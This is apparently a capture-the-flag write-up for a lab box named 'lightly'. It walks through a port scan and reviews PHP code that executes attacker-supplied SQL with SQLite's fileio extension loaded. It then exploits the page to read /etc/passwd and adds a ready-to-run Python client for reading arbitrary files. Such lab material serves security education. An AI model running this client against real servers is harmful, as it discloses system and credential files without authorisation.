# lightly

There's also a video version, if you want to check it out: [lightly](https://youtu.be/18OGrv16Bsg)

**Port Scanning**

First we perform a port scan using nmap to identify open ports and the services and their versions running on these ports.

```
❯ nmap --open -sCV -n -Pn -T5 -v 10.0.160.170 -oN scan
<SNIP>

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-favicon: Unknown favicon MD5: 844B11BD64CCAD62F48FD96A886544CA
| http-methods: 
|_  Supported Methods: GET HEAD POST
```

* `--open`: only show open (or possibly open) ports
* `-sCV`: combines the options `-sC` and `-sV`
* `-sC`: equivalent to `--script=default`
* `-sV`: probe open ports to determine service/version info
* `-n`: never do DNS resolution
* `-Pn`: treat all hosts as online, skipping host discovery
* `-T5`: the fastest timing template (can drop results on slow or lossy links)
* `-v`: increase verbosity level
* `-oN <file>`: output scan in normal format

Only one port is open: 80/tcp, an nginx 1.18.0 web server. Let's use a web browser to view the site's content:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FIchciwwyGQK6znYgScml%2FPasted%20image%2020240731215647.png?alt=media&#x26;token=47ef4425-aec7-4def-af02-0ee6ff98cc8c" alt=""><figcaption></figcaption></figure>

**Code review**

The page's content is the PHP source shown in the image above. Let's break it down step by step:

```
<?php
if(isset($_GET['QUERY']))
{
    header('Content-Type: text/plain');
    $db = new SQLite3(':memory:', SQLITE3_OPEN_CREATE | SQLITE3_OPEN_READWRITE);
    $db->loadExtension('libfileio.so');
    $db->enableExceptions(true);
    $results = $db->query($_GET['QUERY']);
    var_dump($results->fetchArray(SQLITE3_NUM));
} else {
    highlight_file(__file__);
}
```

* The code starts by checking if a GET parameter named 'QUERY' is set using `isset($_GET['QUERY'])`
* If 'QUERY' is set:
  1. It sets the content type of the response to plain text.
  2. It creates a new in-memory SQLite database.
  3. It loads an extension called 'libfileio.so'.
  4. It enables exceptions for the database operations.
  5. It executes the query provided in the GET parameter directly on the database.
  6. It fetches the results of the query as a numeric array and dumps them to the output.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fw4vjWWPXOP53pWbSfxPS%2FPasted%20image%2020240731220623.png?alt=media&#x26;token=cc0d8895-d16b-44a0-8c53-809efbfbd8a8" alt=""><figcaption></figcaption></figure>

* If 'QUERY' is not set, it displays the source code of the current file using `highlight_file()`, which is why the page shows us its own code.

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FVzfIQgX4VqXi4JmicqOD%2FPasted%20image%2020240731220710.png?alt=media&#x26;token=c203c64a-95e3-45c1-9f95-4f19d95a2223" alt=""><figcaption></figcaption></figure>

At this point you may be wondering, "What is libfileio.so???"

If you search for it on Google and look at the following result:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fdm2vqy29BuAyXfgfKTxM%2FPasted%20image%2020240731233312.png?alt=media&#x26;token=7678dca7-584b-4b5f-8e37-267ad58a7499" alt=""><figcaption></figcaption></figure>

Here you will find a post on the SQLite Forum:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2F4WRKt5Hrh4WqRPtsMySQ%2FPasted%20image%2020240731233734.png?alt=media&#x26;token=8d37d9ec-89da-4a8b-a973-1c2066b71d20" alt=""><figcaption></figcaption></figure>

In this post a user reported an issue with the loadable extension `ext/misc/fileio.c`: loading it fails with the error `undefined symbol sqlite3_sqlitefileio_init`. Another user suggests renaming the shared library to `libfileio.so`. That works because, when no entry point is passed to `sqlite3_load_extension()`, SQLite derives one from the file name (a leading `lib` is dropped and the letters up to the first `.` are used), and `sqlite3_fileio_init` is the function that `fileio.c` actually exports.
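To make the renaming trick concrete, here is an added example (not code from the writeup or from SQLite) that models the entry-point rule SQLite applies when `loadExtension()` is called without an explicit entry point. The file names passed in the demo are constructed; the only fact it relies on is that `fileio.c` exports `sqlite3_fileio_init`.

```python
# Added example (not from the writeup or from SQLite): a Python model of how
# sqlite3_load_extension() picks the entry point when none is given, to show
# why the shared object has to be called libfileio.so (or fileio.so) for
# ext/misc/fileio.c, whose init function is sqlite3_fileio_init.
import os


def sqlite_default_entry_point(path: str) -> str:
    """Derive the fallback entry point name SQLite tries after
    'sqlite3_extension_init' fails to resolve.

    Rule (from SQLite's loadext.c): take the file name after the last
    directory separator, drop a leading 'lib' (case-insensitive), keep only
    the ASCII letters up to the first '.', lowercase them, and wrap the
    result in 'sqlite3_' ... '_init'.
    """
    name = os.path.basename(path)
    if name[:3].lower() == "lib":
        name = name[3:]
    stem = name.split(".", 1)[0]
    letters = "".join(c.lower() for c in stem if c.isascii() and c.isalpha())
    return "sqlite3_%s_init" % letters


def extension_loads(path: str, exported_init: str) -> bool:
    """True if a library at `path` exporting `exported_init` would be found
    by the default lookup: either the generic 'sqlite3_extension_init' name
    or the one derived from the file name."""
    return exported_init in ("sqlite3_extension_init",
                             sqlite_default_entry_point(path))


if __name__ == "__main__":
    # Constructed file names: the first three mirror the forum thread, the
    # last shows that version suffixes and case do not matter.
    for candidate in ("./libfileio.so", "/opt/ext/fileio.so",
                      "./sqlitefileio.so", "./libFileIO-1.0.so"):
        print(candidate, "->", sqlite_default_entry_point(candidate),
              "| loads fileio.c:",
              extension_loads(candidate, "sqlite3_fileio_init"))
```

A library named `sqlitefileio.so` makes SQLite look for `sqlite3_sqlitefileio_init`, which is exactly the undefined symbol in the forum post; `libfileio.so` and `fileio.so` both resolve to `sqlite3_fileio_init`.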

If you search for `fileio.c` on Google and look at the following result:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2FZLEAJEvtbiJ17kUUERsj%2FPasted%20image%2020240731234143.png?alt=media&#x26;token=d61def95-2b35-40a6-9c08-344d1a7a05da" alt=""><figcaption></figcaption></figure>

You find a file written in C with a part that looks interesting:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fyr9tA5arLbl79A0oxwW3%2FPasted%20image%2020240731234320.png?alt=media&#x26;token=51096ef2-2010-49aa-a8b9-71019729477a" alt=""><figcaption></figcaption></figure>

This is SQLite's `fileio` extension. It registers SQL functions that touch the filesystem; the two that matter here are `readfile(X)`, which returns the content of file X as a BLOB, and `writefile(X, Y)`, which writes Y into file X. Loading it into a database that accepts attacker-controlled SQL turns SQL execution into file access on the server.

**Solution**

The main vulnerability here is the complete lack of validation: the script executes whatever SQL arrives in the `QUERY` GET parameter, with no whitelist, no escaping, and no restriction on which statements are allowed. An empty in-memory database would hold nothing worth stealing, but the loaded `fileio` extension gives that SQL the `readfile()` and `writefile()` functions, so arbitrary SQL becomes arbitrary file read (and write) on the web server. Note that the script dumps a single `fetchArray()` call, so only the first row of the result is returned; `readfile()` returns the whole file as one value, which is enough. To solve this target we read `/etc/passwd` with the query `SELECT readfile('/etc/passwd')`, sent as the `QUERY` parameter this way:

<figure><img src="https://3863537643-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDdYSqYDpT0Aiur7jvsM1%2Fuploads%2Fjo8MBFrc9XawpUJ0aa80%2FPasted%20image%2020240731222755.png?alt=media&#x26;token=7778c2c9-f15b-4563-b4b0-1cd5cc911d07" alt=""><figcaption></figcaption></figure>
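As an added example (not part of the original writeup), the following Python client automates the step above: it builds the `readfile()` query, URL-encodes it into the `QUERY` parameter, and pulls the file content back out of PHP's `var_dump()` output using the byte length `var_dump()` declares, so quotes or newlines inside the file cannot break the parsing. The target host is taken from the nmap scan and the path `/` is an assumption; the sample response embedded in the block is constructed so the parser can be exercised offline.

```python
# Added example, not part of the original writeup: a small client for the
# QUERY endpoint reviewed above. BASE_URL (the scanned host, path "/") is an
# assumption. Nothing touches the network unless fetch_file() is called.
import re
import sys
from typing import Optional
from urllib.parse import urlencode
from urllib.request import urlopen

BASE_URL = "http://10.0.160.170/"  # assumption: the host from the nmap scan

# var_dump() of fetchArray(SQLITE3_NUM) on one BLOB column looks like:
#   array(1) {\n  [0]=>\n  string(N) "<N bytes>"\n}
# N is a byte count, so the body is handled as bytes, never as text.
VAR_DUMP_STRING = re.compile(rb'string\((\d+)\) "')

# Constructed sample of what the endpoint returns for /etc/passwd on a
# one-line passwd file (32 bytes of content); used for the offline demo.
SAMPLE_RESPONSE = (b'array(1) {\n  [0]=>\n'
                   b'  string(32) "root:x:0:0:root:/root:/bin/bash\n"\n}\n')


def readfile_query(path: str) -> str:
    """Build the SQL; readfile() comes from the loaded fileio extension.
    The path is embedded as a SQL string literal, so single quotes are
    doubled to keep the literal well-formed."""
    return "SELECT readfile('%s')" % path.replace("'", "''")


def build_url(base: str, sql: str) -> str:
    """urlencode() percent-encodes the quotes, parentheses and slashes in
    the SQL so the statement reaches $_GET['QUERY'] intact."""
    return base + "?" + urlencode({"QUERY": sql})


def parse_var_dump(body: bytes) -> Optional[bytes]:
    """Return the first string value in var_dump() output, sliced by its
    declared length. None means no string came back (e.g. readfile()
    returned NULL because the file could not be opened)."""
    m = VAR_DUMP_STRING.search(body)
    if not m:
        return None
    n = int(m.group(1))
    return body[m.end():m.end() + n]


def fetch_file(path: str, base: str = BASE_URL) -> Optional[bytes]:
    """Read a file from the target. This is the only network call."""
    with urlopen(build_url(base, readfile_query(path)), timeout=10) as resp:
        return parse_var_dump(resp.read())


if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. python3 client.py /etc/passwd
        content = fetch_file(sys.argv[1])
    else:
        # Offline demo on the constructed sample response.
        print(build_url(BASE_URL, readfile_query("/etc/passwd")))
        content = parse_var_dump(SAMPLE_RESPONSE)
    sys.stdout.write(content.decode("utf-8", "replace")
                     if content is not None else "<no row returned>\n")
```

Run it with a path argument to query the live target, or without arguments to see the encoded URL and the parser working on the embedded sample. Because the script enables SQLite exceptions, a syntax error in the SQL produces a PHP fatal error rather than a row, which the parser reports as no row returned.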
